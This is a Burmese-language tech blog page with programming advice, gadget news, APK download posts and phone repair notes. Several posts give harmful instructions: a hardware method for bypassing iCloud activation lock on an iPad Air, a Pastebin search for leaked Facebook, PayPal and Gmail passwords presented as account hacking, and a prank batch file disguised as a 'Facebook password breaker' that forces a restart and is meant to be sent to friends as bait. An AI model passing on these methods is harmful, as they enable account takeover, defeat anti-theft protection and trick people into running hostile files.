Monday, April 11, 2016

Programming ဘယ်လိုလေ့လာမလဲ



Programming ကို စိတ်ဝင်စား ပေမယ့်

ဘယ်ကနေ စလို့ ဘယ်လို လေ့လာ ရမှန်း မသိသူ များ အတွက် wikihow က ဆောင်းပါး ကိုပဲ ဆီလျော် သလို ဘာသာ ပြန်ပေး လိုက်ရ ပါတယ်။
Decide your goal
Programmer လို့သာ ခေါင်းစဉ် တပ်လိုက် တာ။ ရွေးစရာ လိုင်းတွေ က အများကြီး ပဲ။ Web လား၊ Software လား၊ Desktop Application လား၊ System လား အစရှိ သဖြင့် ရွေးစရာ တွေ အများကြီး ပဲ။ ကိုယ်က စက်ရုပ် တီထွင် တဲ့ ပညာရှင် ဖြစ်ချင် တာလား၊ OS လုပ်ချင် တာလား၊ ဖုန်း Application လုပ်ချင် တာလား၊ Web application လုပ်ချင် တာလား အစရှိ သဖြင့် သီးသန့် လမ်းကြောင်း တစ်ခု ကို အရင်ဆုံး Choice လုပ်ရ ပါအုံး မယ်။ အဲဒါ လုပ်ပြီး ပန်းတိုင် ကို သေချာ ချထားမှ အကောင်း ဆုံး လုပ်နိုင်မှာ ဖြစ်ပါ တယ်။
Choose a programming language
အကယ်၍ ကိုယ်က Web Programming ကို လေ့လာ မယ် ဆိုရင် တောင် PHP, Java, C++, .Net အစ ရှိသဖြင့် ပြောမကုန် အောင် များပြား လှတဲ့ Language တွေ ရှိနေ ပါသေး တယ်။ တစ်ခု တည်း ကို အရင်ဆုံး Specialized လုပ်မှ အောင်မြင် မှာလေ။ နေရာ တစ်ခု ရောက်မှာ လေ။ ဒီတော့ ကိုယ် သွားချင် တဲ့ လမ်းကို ရွေးပြီး ပန်းတိုင် ကို သေ သေချာချာ သတ်မှတ် ထားဖို့ လိုပါတယ်။
Fall in Love in mathematics
ကွန်ပြူတာ နဲ့ ပက်သက်တဲ့ အလုပ် လုပ်ပြီ ဆိုရင် သင်္ချာ ကို မချစ် လို့ မရတော့ဘူး။ Fibonacci, Floyd triangle, Fourier Seiries အစရှိ သဖြင့် Mathematical series များကို ထိတွေ့  ထားဖို့ လိုအပ် ပါတယ်။ သင်္ချာ ဥာဏ်စမ်း လေးတွေ ကိုလည်း အားတဲ့ အချိန်တိုင်း လေ့ကျင့်ပြီး ဖြေဖြစ် ရင်တော့ အကောင်းဆုံး ပေါ့။ Programmer ဖြစ်ဖို့ ဆုံးဖြတ် လိုက်သူ က သင်္ချာ နဲ့ ချစ်သူ ဖြစ် ဖို့ ခံယူ လိုက်သလို ပါပဲ။
Be self-motivated
Rome was not built in a day တဲ့။ ဒီနေ့မှ စလုပ်ပြီး မနက်ဖန် အကုန် တတ်ပြီလို့ ဘယ်ပြော လို့ရမလဲ။ ဒါကို သိထားပြီး အမြဲတမ်း ကိုယ့် ကိုယ်ကို Motivate လုပ်နေရ မယ်။ စိတ်အား တက်ကြွမှု ရှိနေ ရမယ်။ ယုံကြည် ချက် လည်း ရှိနေ ရပါမယ်။
Take your time
မအောင်မြင် တဲ့ ပရိုဂမ်မာ တွေရဲ့  အားနည်းချက် က အချိန် မပေး တာပါပဲ။ Error တွေ့ နေပေ မယ့် ဒီ Error ကို အဖြေရှာ ဖို့ အတွက် ကောင်းကောင်း အချိန် မပေးပြီး Project ပြီးဖို့ သာ ခေါင်းခဲ ပြီး လုပ်တော့၊ အိုင်ဒီယာ ကောင်း မထွက်တဲ့ အပြင် အမှားလည်း များပါတယ်။ Problem Solving ဆိုတာ Programming မှာ ဘာသာရပ် တစ်ခု လိုပါပဲ။ Programmer တစ်ယောက် ဟာ code ရေးတဲ့ အခါမှာ တင်မကပဲ တကယ့် လက်တွေ့ ဘဝမှာ ပါ ပြဿနာ ကို ခေါင်းအေးအေး ထား ဖြေရှင်း တတ်သူ တစ်ယောက် ဖြစ်လာ ပါတယ်။ ဒီတော့ အချိန်ပေးပြီး လုပ်ဖို့တော့ လိုအပ်ပါတယ်။
Never Back Down
Programming ဆိုတာ မခက်ဘူး။ သို့ပေမယ့် စိတ်ရှုပ်ဖို့ ကောင်းတယ်။ စိတ်မရှည် တဲ့ သူတွေနဲ့ သင့်တော် တဲ့ အလုပ် မဟုတ်ဘူး။ စိတ်ရှည်တယ် ဆိုတာ ကလည်း လူတိုင်း လေ့ကျင့် လုပ်ယူလို့ ရတဲ့ အကျင့် စရိုက် တစ်ခု။ ဒါကို ငါနဲ့တော့ အဆင်မပြေ ပါဘူးလေ ဆိုပြီး ရပ်လိုက်ရင်၊ နောက် ဆုတ် လိုက်ရင် တော့ သွားပါပြီ။ ရှေ့ မရေက်၊ နောက် မရောက် အလယ် မှာ ကိုးရိုး ကားရား ဖြစ်တဲ့ ဘဝ က ပိုဆိုး ပါတယ်။ ဒီတော့ မလျော့သောဇွဲနဲ့ နောက် မလှည့်တန်း ကြိုးစား ရမှာက Programmer တစ်ယောက်ရဲ့  ခံယူချက် ပဲ ဖြစ်ပါတယ်။
Become a master
Programming Language တစ်ခုမှာ ဆရာကျ သွားသူ တစ်ယောက် ဖြစ်ဖို့ ဆို တာ အဲဒါကို အနည်းဆုံး ၂ နှစ် လောက် တော့ အချိန်ပေး ရသေး တယ်။ ၁ နှစ်ပဲ ကြိုးစား ထား တဲ့ ရလဒ် က လုပ်ငန်းခွင် ဝင်နိုင်တဲ့ level တစ်ခုသာ ရှိသေး ပြီး expert မဖြစ်နိုင် ပါဘူး။ ၂ နှစ်နဲ့ ကော ဆရာ ကျပြီ လို့ ကြိမ်းသေ ပြောလို့ ရပါ့မလား။ ၄ နှစ်သာ ကြာသွားမယ်။ သူများ ခိုင်းတဲ့ ပရိုဂရမ် တွေ၊ ကုဒ်တွေပဲ ရေးပြီး ကိုယ်ပိုင် ပရောဂျက်၊ application များ မလုပ်နိုင် သေးရင် Master တစ်ယောက် ဖြစ်တဲ့ ပရိုဂမ်မာ လို့ မဆိုနိုင် ပါဘူး။
Be a bookworm
ပရိုဂမ်မာ ကောင်း တစ်ယောက် က လည်း စာဂျပိုး ပါပဲ။ စားဖတ်အား အမြဲ သန်နေ ရမယ်။ စာ မှာ တောင်မှ Programming တစ်ခုတည်း တင်မကပဲ သုတ၊ ရသ၊ သတင် အစုံအလင် အမြဲ စိတ် ဝင် တစား ဖတ်ချင်နေ သူ ဖြစ်ရ ပါမယ်။ ဒါက a must တော့ မဟုတ်ပါဘူး။ Optional ပါ။ သို့ပေ မယ့် ပရိုဂမ်မာ ကောင်း တစ်ယောက် ဖြစ်ဖို့ စာဖတ် အား ကောင်းဖို့ တောင် recommend ပေးထား ကြပါတယ်။
Invest on Training Centers
ကိုယ် တစ်ယောက်တည်း လေ့လာ နေတာ အဆင်မပြေ တော့ဘူး။ အချို့  အချက်တွေ နည်း ပညာ ကျကျ သိဖို့ ကျတော့ မလွယ်တော့ ဘူး ဆိုရင် သင်တန်း တက်ဖို့ အကြံ ပေး ပါတယ်။ တစ်ယောက် တည်း Self Study လုပ်တယ် ဆိုတာ သူ့ အကန့် အသတ် နဲ့ သူ ရှိပါတယ်။ သင်တန်း တက်တယ် ဆိုတာ ပညာ တစ်ခု တည်း သင်တာ မဟုတ်ပါ ဘူး။ စီနီယာ ပရိုဂမ်မာ များ ရဲ့  ပရောဂျက် များ၊ လုပ်ဆောင် ချက်များ၊ အရည်အချင်း များ ကို လေ့လာခြင်း လည်း ပါဝင် ပါတယ်။ ဒါကြောင့် တစ်ေ ယာ က် တည်း လေ့လာ လို့ နေရာ တစ် ခုမှာ တစ် နေရင် training center ကောင်းကောင်း တစ် ခု ရွေးချယ် လို့ Invest လုပ်ဖို့ Recommend ပေးပါတယ်။
Programmer တစ်ဦး ဖြစ်ဖို့ အတွက်၊ အတန်း ပညာ၊ ဘွဲ့ ပညာ တတ်နေမှ မဟုတ် ပါဘူး။ သင်္ချာ တွက်ချက် ဥာဏ် ရှိပြီး Programmer ဖြစ်ချင်စိတ် ရှိနေရင် Programmer တစ်ဦး ဖြစ်နိုင် ပါပြီ။

Saturday, March 26, 2016

ipad air 3G အား hardware ဖြစ် icloud ကျော်နည်း

ipad air 3G အား hardware ဖြစ် icloud ကျော်နည်းလေး မျှဝေပျစေခင်ဗျ
%ပြည့်ရကြောင်း စမ်းသက်ပြီး အာမခံပါသည် ။
ipad air 3G အား icloud ကျော်ပြီးပါ က 3G သုံးလို့ မရတော့ပါ Wifi သာ သုံးလို့ ရမည် ဖြစ်ပါတယ် ။
၁။ သင့် Ipad air ကို Hardware နည်းဖြစ် icloud ကျော်မည် ဖြစ်ပါသဖြင့် Touch မှန်ကို
ခွာပြီး စက်ပြားအားထုတ်လိုက်ဖို့ လိုအပ်ပါသည်။ (မှန်ခွာရာတွင် သတိထားခွာရန်လိုအပ်ပါသည်)
၂။စက်ပြားထုတ် ပြီးပါ က ပုံတွင် ပြထားသည်အတိုင်း R1506 ကို ဖြုတ်ထုတ်လိုက်ပါ
CPU နှင့် အလွန်နီးပြီး အလွန်သေးငယ် သည့်အတွက် အပူမသုံးပဲ ဇာဂနာ နှင့် သာ ကလှော်ထုတ် လိုက်ပါ ထို Resistor လေးပြုတ်သွားလျှင် ရပါပြီ R1507 သည် Schematic Diagram တွင် သာပါပြီး ဘုတ်ပြားပေါ်တွင် မရှိပါ ။
၃။ ipad air အား ပြန်ပြီးတပ်ဆင်လိုက်ပါ ပြီးနောက် ပါဝါဖွင့်လိုက်ပါ ထိုအခါ DFU mode သို့ ရောက်ပြီး ဘာပုံမှပေါ်မည်မဟုတ်ပါ သို့ သော် စိုးရိမ်စရာမရှိပါ
၎။ကွန်ပြူတာနှင့်ချိတ်ဆက်ပြီး Firmware ပြန်တင်လိုက်ပါ
firmware တင်ရာတွင် နဂိုမူလ ipad air 3G Firmware (iPad Air Cellular): iPad4,2_9.2.1_13D15_Restore.ipsw ကိုမတင်ပဲ ipad air wifi firmware (iPad Air Wi-Fi): iPad4,1_9.2.1_13D15_Restore.ipsw ကိုတင်လိုက်ပါ
၅။Firmware တင်ပြီးသွားပါက icloud ကျော်သွားပြီ ဖြစ်ပါသဖြစ် မိတ်ဆွေ အသုံးပြုလို့ ရပါပြီ ခင်ဗျာ ……
သတိ (ipad air wifi ကို icloud ကျော်မရပါ)
Credit TO: နေဒွန်းဝင်း

Pastebin Accounts Hacking (Facebook/Paypal/LR/Gmail/Yahoo)

ကျွန်တော်လည်းလေ့လာနေဆဲဖြစ်လို့ 99% အဆင်ပြေတယ်လို့ အာမမခံပါတယ်
ကိုယ်ညဏ်ရှိသလို ကြိုးစားရင်တော့ ပွပေါက်ချည်းပါပဲ...

ကဲ လုပ်ငန်းလေးစလိုက်ရအောင်ဗျာ-

[+] အရင်ဆုံး http://pastebin.com ကိုသွားလိုက်ပါ..

[+] ပြီးရင် ညာဘက် အပေါ်နားမှာ search bar ရှိပါတယ်..                                               အဲ့တည်းမှာ..အောက်ကပာာလေးတွေထည့်ကြည့်လိုက်


[+] Program:firefox Url/Host:http://www.facebook.com login

[+] Program:firefox Url/Host:http://paypal.com login

[+] များစွာသော User:Pass တွေ ကျလာတာကိုတွေ့ ရမှာဖြစ်ပါတယ်... (ပုံတွင်ကြည့်ပါ)

Make A Funny Facebook Virus

သူငယ်ချင်းတွေကို စချင်နောက်ခင်ကြတဲ့ ဘော်ဒါတွေအတွက်ပေါ့ heeeee
ဖိုင်လ်လေးတစ်ခုကို ပို့ ပြီး လက်ရှိသုံးနေတဲ့ ကွန်ပြူတာကို ထိုးရပ်သွားပြီး Auto restart ချခိုင်းပြီး စိတ်ပူသွားအောင် စချင်နောက်ချင်သူရှိရင် ဒီ funny virus လေးနဲ့ စနောက်ကြည့်ရအောင်လေ Hee Heee


 

1) Open notepad
 

2) Type this in :
@echo off msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES
YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE
VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE shutdown -r -t 300 -c ―SORRY!!! YOUR FACEBOOK ACCOUNT
ARE NOW BEING DELETED!!! PLEASE WAIT ..........."

 

3) Save as facebook password breaker .bat
 

4) Send it to your friends and say them it can break Facebook accounts
 

When He/She double click it a message will open and their computer
will restart. After five minutes windows will restart, that is all.
 

This is totally harmless and will give you a laugh.
 

NOTE: - The hack can be changed and use to make orkut virus or hi5. ;)
မိမိ targetမရိပ်မိအောင်လို့  exe ဖိုင်လ်အဖြစ်သို့ပြောင်းပေးရမှာနော် .မိမိ ညဏ်ရှိသလိုသုံးနိုင်ပါတယ်...


Friday, March 25, 2016

ဒေါ်လာ ၁၅၀ တန် Photo Software Suite ကို Google အခမဲ့ဖြန့်ချိ

Google သည် image processing tool များပါဝင်သော Nik Collection ကို အခမဲ့ download ပြုလုပ်၍ အသုံးပြုနိုင်ကြောင်း ထုတ်ပြန်ခဲ့သည်။
ယခင်က ၎င်း software ကို ကန်ဒေါ်လာ ၁၅၀ ဖြင့်ရောင်းချသော်လည်း ယခုအခါတွင် ကျွမ်းကျင်ပညာရှင်များ အသုံးပြုသော plugin ၇ ခုကို Mac နှင့် Windows ဗားရှင်းနှစ်ခုစလုံး၌ အခမဲ့ download ပြုလုပ်၍ အသုံးပြုနိုင်ပြီ ဖြစ်သည်။ ၂၀၁၆ ခုနှစ်အတွင်း ၎င်း software ဝယ်ယူခဲ့သူများကို လာမည့်ရက် အနည်းငယ်အတွင်း ငွေပြန်အမ်းပေးမည် ဖြစ်ကြောင်း Google မှ ပြောကြားခဲ့သည်။
၎င်း suite တွင် Analogue Efex Pro, Colour Efex Pro, Silver Efex Pro, Viveza, HDR Efex Pro, Sharpener Pro နှင့် Dfine များ ပါဝင်သည်။ အဆိုပါ software များကို အတူတကွအသုံးပြု၍ ဂန္တဝင်ရုပ်ရှင်ကားနှင့် မှန်ဘီလူးများကို ပိုမိုအရည်အသွေးကောင်းလာစေရန် ပြုလုပ်နိုင်သလို အဖြူနှင့်အမည်း ပြောင်းလဲမှုများနှင့် အရောင်များ မှန်ကန်စေရန် ဖန်တီးပေးနိုင်သည်။ ထို့အပြင် HDR effect များနှင့် tool များအတွက် plugin များကိုလည်း ထောက်ပံ့ပေးထားသည်။
Google သည် ၂၀၁၂ ခုနှစ်တွင် Nik Software အပြင် iOS အခြေခံ နာမည်ကျော် ဓာတ်ပုံတည်းဖြတ်သည့် app ဖြစ်သော Snapseed ကို ဝယ်ယူခဲ့သည်။ ထို့နောက် Snapseed ၏ Android နှင့် Windows အခြေခံ desktop ဗားရှင်းများကို ရပ်ဆိုင်းခဲ့သည်။
Google သည်ဝယ်ယူမှု တစ်စိတ်တစ်ပိုင်းအဖြစ် အခကြေးငွေဖြင့် ဝယ်ယူနိုင်သော app များအတွက် Nik Collection ကိုတည်ဆောက်ခဲ့သည်။ ထို software suite သည် သုံးစွဲသူ များပြားပြီး ကျွမ်းကျင်ပညာရှင် သုံးစွဲသူများက ထောက်ပံ့မှုနှင့် ရောင်းချမှုများ ဆက်လက်ရှိစေလိုသည်။
ထိုအချိန်တွင် Nik Collection ကိုဝယ်ယူရန် ကန်ဒေါ်လာ ၄၉၉.၉၅ ကျသင့်မည် ဖြစ်သောကြောင့် Google က suite တစ်ခုလုံးအတွက် ကန်ဒေါ်လာ ၁၅၀ အထိ ဈေးနှုန်းလျှော့ချခဲ့သည်။ ယခုအခါတွင် Nik Collection သည် Google ၏ အခမဲ့ အသုံးပြုနိုင်သော app အများအပြားအကြားတွင် တစ်မူထူးခြားနေမည် ဖြစ်သည်။
သုံးစွဲသူများအနေဖြင့် Nik Collection ကို Mac နှင့် Windows အတွက် Google မှ တိုက်ရိုက် download ပြုလုပ်နိုင်ပြီ ဖြစ်သည်။
Ref: Forbes

Tags


တရုတ်အစိုးရအတွက် Windows 10 ဗားရှင်းတစ်မျိုးကို Microsoft ဖန်တီး

Microsoft သည် Windows 10 Zhuangongban သို့မဟုတ် Windows 10 Specially-provided Edition ဟုခေါ်သော Windows 10 ဗားရှင်းတစ်မျိုးကို တရုတ်အစိုးရအတွက် ဖန်တီးခဲ့ကြောင်း တရုတ်မဂ္ဂဇင်း Caixin မှ ဖော်ပြခဲ့သည်။
တရုတ်နိုင်ငံ၏ CETC နှင့် ပူးပေါင်းဆောင်ရွက်မှုမှတစ်ဆင့် အထူးဖန်တီးထားသော Windows ဗားရှင်း၏ ပထမဦးဆုံးဗားရှင်းကို Microsoft က အပြီးသတ်လုပ်ဆောင်နိုင်ခဲ့ကြောင်း Microsoft China ၏ အမှုဆောင်အရာရှိချုပ်ဖြစ်သူ ရပ်ဖ်ဟော့ပ်တာက အထက်ပါမဂ္ဂဇင်းထံ ပြောကြားခဲ့သည်။
Microsoft သည် တရုတ်နိုင်ငံအတွက် သီးသန့်ဆော့ဖ်ဝဲဖန်တီးရန် သဘောတူညီမှုရရှိခဲ့ကြောင်း ပြီးခဲ့သည့် ဒီဇင်ဘာက ကြေညာခဲ့သည်။
တရုတ်အစိုးရအတွက်ဖန်တီးထားသော Windows 10 ဗားရှင်းတွင် Microsoft ၏ သုံးစွဲသူထံပစ်မှတ်ထားသော app နှင့် ဝန်ဆောင်မှု အနည်းငယ်သာပါဝင်ပြီး တရုတ်အစိုးရ၏ လိုအပ်ချက်နှင့်ကိုက်ညီသော စီမံခန့်ခွဲမှုနှင့် လုံခြုံရေးဆိုင်ရာထိန်းချုပ်မှု လုပ်ဆောင်ချက်များ ပိုမိုထည့်သွင်းထားကြောင်း ဟော့ပ်တာက Caixin မဂ္ဂဇင်းထံ ပြောကြားခဲ့သည်။
Ref: TechInAsia

OPPO F1 (Rose Gold) ကို ပြည်တွင်း၌ ဝယ်ယူနိုင်ပြီ

OPPO အနေဖြင့် ကင်မရာပိုင်း အသားပေးထားသော ထုတ်ကုန်သစ်ဖြစ်သည့် OPPO F1 (Rose Gold) ကို ပြည်တွင်း၌ ဝယ်ယူနိုင်ပြီဖြစ်ကြောင်း သိရသည်။
အဆိုပါ OPPO F1 ဖုန်းမှာ ကင်မရာပိုင်း အထူးအသားပေးထားပြီး aperture f/2.0 အကျယ်ရှိ 8MP ရှေ့ကင်မရာကို အသုံးပြုထားသည့်အတွက် ရုပ်ထွက် အရည်အသွေးပိုင်း အထူးကြည်လင်ပြတ်သားမှု ရှိစေမည့်အပြင် ရှေ့ဘက်ကင်မရာဖြင့်ပင် Full HD video များကို ရိုက်ယူနိုင်မည်ဖြစ်သည်။ နောက်ကင်မရာမှာမူ 13MP အရည်အသွေးကို အသုံးပြုပေးထားသည်။
OPPO F1 (Rose Gold) ကို ပုံမှန်ဈေးနှုန်း ၂၉၉,၀၀၀ ကျပ်ဖြင့်ပင် ဝယ်ယူနိုင်ပြီး ၀ယ်ယူသူများအနေဖြင့် OPPO မှပေးအပ်ထားသည့် လက်ဆောင်ပစ္စည်း ၈ မျိုးပါဝင်သော Special Gift Set ကိုလည်း ရရှိနိုင်မည်ဖြစ်သည်။
ပြည်တွင်း၌ OPPO F1 ကို Gold Colour ကိုသာ ပထမဆုံး မိတ်ဆက်ရောင်းချပေးခဲ့ပြီး ယခုအခါမှသာ Rose Gold ကို ထပ်မံတင်သွင်း ရောင်းချခြင်းဖြစ်ကြောင်း သိရသည်။

Eaus Data Recovery Free

SD Card က Data တွေ  ပျက်ကုန်ပီလား External Harddisk က ဟာတွေရော
Format ရိုက်မိလို့ ပျက်ကုန်တာလား မပူပါနဲ့ ချက်ခြင်း ပြန်ပီး Recovery 
ပြန်ခေါ်ပါ.. ဒါပေမယ့် တစ်ခုတော့ ရှိပါတယ်. Data တွေ ပျက်သွားတာနဲ့
ချက်ခြင်း data တွေဘာ data မှ ပြန်မထည့်ပါနဲ့ .  ပျက်သွားတာ သိသိချင်း
ပြန်ပီး recovery ပြန်လုပ်ပါ ……….
ခုကျနော့် ပေးထားတဲ့ဟာနဲ့သာ လုပ်ပါ data တွေ အစီစဉ်လိုက် folder အလိုက်
ပြန်ပါလာပါ လိမ့်မယ် 100 % စမ်းသပ်ပီးသားပါ.. 
တစ်ခုရှိပါတယ် flashtool firmware တွေပါတဲ့ ဖိုင်တွေ
ပြန်ခေါ်မယ်ဆိုရင်တော့ အပြင်မှာ Documant နဲ့ Other ကို အမှန်ခြစ်ပေးပါ




ဖုန်းငွေဖြည့်ခြင်း အပေါ် အခွန်ကောက်ခံခြင်း

သူငယ်ချင်းတို့ ၂၀၁၅ ဇွန်လက စတင်ကာ ဖုန်းငွေဖြည့်သူတိုင်း ကုန်သွယ်လုပ်ငန်းခွန် ( ၅ ) ရာခိုင်နှုန်း ကောက်ခံမည်ဟု ကြေငြာခဲ့သော်လည်း ၂၀၁၅ - ၂၀၁၆ ဘဏ္ဍာရေးနှစ် အတွင်း ကုန်သွယ်ခွန် ( ၅ ) ရာခိုင်နှုန်းကို ကင်းလွတ်ခွင့် ပြုရန် လွှတ်တော်မှပြန်လည်ဆုံးဖြတ်ခဲ့သည်။
မြန်မာပြည်တွင်း လုပ်ကိုင်လျှက်ရှိသော အော်ပရေတာများ ဖြစ်သည့် တယ်လီနော မြန်မာ / အောရီဒူး မြန်မာ / မြန်မာ့ ဆက်သွယ်ရေး MPT တို့က ကောက်ခံခြင်း ကိစ္စ ဆိုင်းငံ့ကာ ကုန်သွယ်ခွန် ကောက်ခံမည့်ရက်ကို ထပ်မံကြေငြာမည်ဟု သတင်းထုတ်ပြန်ခဲ့ကြပါသည်။
ဖုန်းငွေဖြည့်ခြင်းအပေါ် ကုန်သွယ်ခွန် ( ၅ ) ရာခိုင်နှုန်း ယခု ၂၀၁၆ ဧပြီ ( ၁ ) ရက်နေ့တွင် စတင်ကောက်ခံတော့မည် ဖြစ်ကြောင်း မြန်မာ့ဆက်သွယ်ရေး လုပ်ငန်း စီးပွားရေး ဋ္ဌာနမှ တာဝန်ရှိသူတစ်ဦးက တရားဝင်ပြောကြားခဲ့သည်။
အခွန်ကောက်ခံမှု ပုံစံအရ ဖုန်းဘေ ( ၁၀၀၀ ) ကျပ် ဖြည့်ပါက အခွန်တန်ဖိုး ( ၄၈ ) ကျပ် နှုတ်ယူကာ ( ၉၅၂ ) ကျပ် သုံးစွဲသူက အသုံးပြုခွင့် ရရှိပါမည်။
ဖုန်းဘေ ( ၃၀၀၀ ) ဖြည့်သွင်းပါက - ၂၈၅၇ ကျပ်
ဖုန်းဘေ ( ၅၀၀၀ ) ဖြည့်သွင်းပါက - ၄၇၆၂ ကျပ်
ဖုန်းဘေ ( ၁၀၀၀၀ ) ဖြည့်သွင်းပါက ၉၅၂၄ ကျပ်
ဖုန်းဘေ ( ၂၀၀၀၀ ) ဖြည့်သွင်းပါက - ၁၉၀၄၈ ကျပ် သုံးစွဲသူက အသုံးပြုခွင့် ရရှိမည် ဖြစ်ပါသည်။
နိုင်ငံတကာလည်း အခွန်ကောက်ခံခြင်းများ ရှိပါတယ်။ မြန်မာပြည်မှာတော့ ၂၀၁၆ ဧပြီ ( ၁ ) ရက်နေ့တွင် စတင်ကောက်ခံမည် ဖြစ်ကြောင်း သိရပါသည်။

ရေးသားသူ -Myo Thant Zin

Font Sytle ပါပြီးသား ဖုန်းအားလုံးကို မြန်မာစာ အလွယ်တကူထည့်ယူနိုင်တဲ့ ဆော့ဝဲ- iFont(Expert of Fonts) v5.7.4 (Unlocked) APK For Android

iFont ဆိုရင် လူတိုင်းသိလောက်မှာပါ တကယ် perfect replacement font အမျို အစားပါ ပြီးတော့ ဒီဆော့ဝဲ(Application) လေးဟာ Font Sytle ပါပြီးသား ဖုန်းအားလုံးကို မြန်မာစာ အလွယ်တကူထည့်ယူနိုင်တဲ့ ဆော့ဝဲဖြစ်ပါတယ်။Android အတွက် သောင်းပေါင်းများစွာသော Font Apk တွေထဲမှာတော့ The best အဖြစ်ရပ်တည်နေတာပါ။ အထူးသဖြင့် ဒီဆော့ဝဲလေးဟာ Samsung ဖုန်းသမားတွေအတွက်Font Style ပါထားပြီးသား Galaxy ဖုန်းအားလုံးကိုရော့ပြီးတော့ Galaxy S3,S4,Note,Note II အထက် ဖုန်းအားလိုမြန်မာစာ လုံးဝအမှန်ထည့်ပေးနိုင်တဲ့ တစ်ခုတည်းသော Font Apk လေးဖြစ်ပါတယ်။အသုံးပြုလိုသူအတွက်ကတော့ ဖိုင် size  ကတော့ 6.58MB  ဖြစ်ပြီး Android ဖုန်း 2.3 အထက်ရှိဖုန်းသာ အသုံးပြုနိုင်ပါတယ်။





အားလုံး အဆင်ပြေကြပါစေဗျာ
Clash Of Clan Update (21.3.2016) (စိတ်ချလက်ချသာဒေါင်း စမ်းပီးမှ တင်ပေးတာ)
Version: 8.212.3
Requirement: Android 4.0
Download (58) MB
 https://my.pcloud.com/publink/show?code=TbbctalK

Thursday, March 24, 2016

Huawei ဖုန်းများအတွက် Android OS 4.2 ကနေစပြီး Google App များသွင်းလို့ အဆင်မပြေခဲ့ပါဘူး အခုတော့ အဆင်ပြေပါပြီ ကျွန်တော် တော့ ဒေါင်းလုပ်မဆွဲရသေးပါဘူး အရင်တင်ပေးပါတယ် ကောင်းကျိုးဆိုးကျိုးလေးများကို Comment လေးရေပေးခဲ့ကြပါ သွင်းပုံသွင်းနည်းကတော့ အရင်အတိုင်းပါပဲ မပြေတော့ဘူးနော်...


4.3 MMSD Gapp Installer (Gmail,Gtalk,Playstore သွင်းရန်)

Android Version 4.3 တွေ အတွက် Google App များဖြစ်တဲ့ Gmail,Gtalk,Playstore များ

ထည့်သွင်းတဲ့ Android Application ဖြစ်ပါတယ်။ ဒီ APP ကို အသုံးပြုဖို့အတွက်

Root Access ရှိရန်လိုအပ်ပါတယ်။ ဒီ App သွင်းလိုက်တာနဲ့ မိမိဖုန်းရဲ့ Android Version

ကိုဖော်ပြပေးမှာဖြစ်ပြီး Support လို့ရေးထားရင် စတင်လုပ်ဆောင်နိုင်ပါတယ်။

ဒီ App ကို အသုံပြုဖို့ data ဖိုင်လိုအပ်ပါတယ်။

Connection ကောင်းရင် Auto Download လုပ်လိုက်ပါ။

မကောင်းသူတွေကတော့ အောက်မှာ Data ဖိုင်ကိုပေးထားပါတယ်။

data ဖိုင်ကို Download ဆွဲပြီးရင် Internet Memory ထဲကို MMSD Folder

ဆောက်ပြီး ထည့်ပေးပါ။ Zip ဖြည်ရန်မလိုအပ်ပါဘူး။

SD CARD ထဲမထည့်ပါနဲ့

ဒီ APP ကို Download ဆွဲရန် Playstore မှာလဲ တင်ပေးထားပါတယ်။

Playstore မှာ ဒေါင်းဖို့ လွယ်သူများ ဒေါင်းပေးပါ။https://play.google.com/store/apps/details?id=mmsd.phyochan.fourthreegappinstaller

ရေဝင်ခြင်းကြောင့် ဖြစ်တတ်တဲ့ Huawei G610 U00 ဖုန်းအကြောင်း

မင်္ဂလာရှိသော နှစ်သစ်အခါသမယမှာ ...
(အခြားသူများ မင်္ဂလာ ရှိမရှိတော့ မသိပါ
ဖုန်းဆားဗစ်ဆရာများတော့ သေချာပေါက် မင်္ဂလာ ရှိပါသည်
သင်္ကြန်မှာ ရေချိုးပေးထားတဲ့ဖုန်းတွေ ဝင်လာမစဲ ဖြစ်နေခြင်းကြောင့် )
ရေဝင်ခြင်းကြောင့် ဖြစ်တတ်တဲ့ Huawei G610 U00 ဖုန်းအကြောင်း
ပြောပြချင်ပါတယ် ... ကျွန်တော်လဲ G610 နဲ့ တော်တော်ကြီး ခေါင်းပူခဲ့ဖူးပါတယ်
ပါဝါဖွင့်လိုက်ရင် new:safe old:risk ဆိုတဲ့ စာလေးနှစ်ကြောင်းပဲ ပေါ်တဲ့အခါပေါ်လိုက်
ဖန်းဝဲ တက်လာပြန်ရင်လဲ ဘယ်ဘက်အောက်နားမှာ SAFE MODE ဆိုတဲ့
စာကြောင်းလေး ပေါ်တဲ့အခါ ပေါ်လိုက် ဖြစ်နေတတ်တဲ့ အကြောင်းလေးပါ
.............................................................................................
G610 U00 ကို မျက်လုံးတွေ ပြာနေတဲ့အထိ ကြိုးစားပြင်ခဲ့ဖူးပါတယ်
Vol down Error ထင်လို့ hardware ပိုင်းကို အသေးစိတ် လိုက်ခဲ့ဖူးပါတယ်
နောက်ဆုံးတော့လဲ flash tools firmware နဲ့ အဆင်ပြေခဲ့ပါတယ်
Dead နေတဲ့ ဖုန်းကိုတောင် flash tools firmware နဲ့ ပြန်တင်လို့ ရခဲ့တယ်ဗျ
Huawei Y511 U00 ကိုလဲ အဆင်ပြေခဲ့ဖူးတယ် .....
ဒီတခါလာတဲ့ G610 U00 ဖုန်းက ဖွင့်လိုက်ရင် new:safe old:risk ပဲ
ပေါ်နေပြီး ဖန်းဝဲ တက်မလာတော့ပါဘူး ...
flash tools firmwae တင်ဖို့လုပ်တော့ flash tool က မသိတော့ဘူးဗျ
dload နဲ့လဲ တင်လို့မရ recovery လဲ ဝင်လို့ မရတော့ဘူး ...
ဒါဆိုရင်တော့ hardware ပိုင်းစစ်မှ ဆိုပီး ဖြုတ်စစ်ပါတယ်
Supply ချိတ်ပြီး စမ်းကြည့်တော့ ...
power ငုတ်မှာ 3.58V , vol up ငုတ်မှာ 1.7V နဲ့ vol down မှာ 2.6V ရှိနေတယ်
ခဏနေ ပြန်တိုင်းတော့ ဗို့တွေ ပြောင်းနေပြန်ရော ပုံမှန် မပြဘူးဖြစ်နေတယ်
Digital မသေချာမှာစိုးလို့ Analog မီတာ ပြောင်းတိုင်းတယ် မမှန်ဘူးဖြစ်နေတယ် ...
ဒါဆိုရင် ဗို့အားပေးလမ်းကြောင်းမှာ တခုခု လွဲနေပြီပေါ့
အိုင်စီတလုံးလုံးက overload ဆွဲနေလို့ဖြစ်နိုင်မလား
ဗို့အားလမ်းကြောင်းက ဗို့အားတည်ငြိမ်အောင် ထိန်းပေးတဲ့ ကွန်ဒင်ဆာ (Condenser)
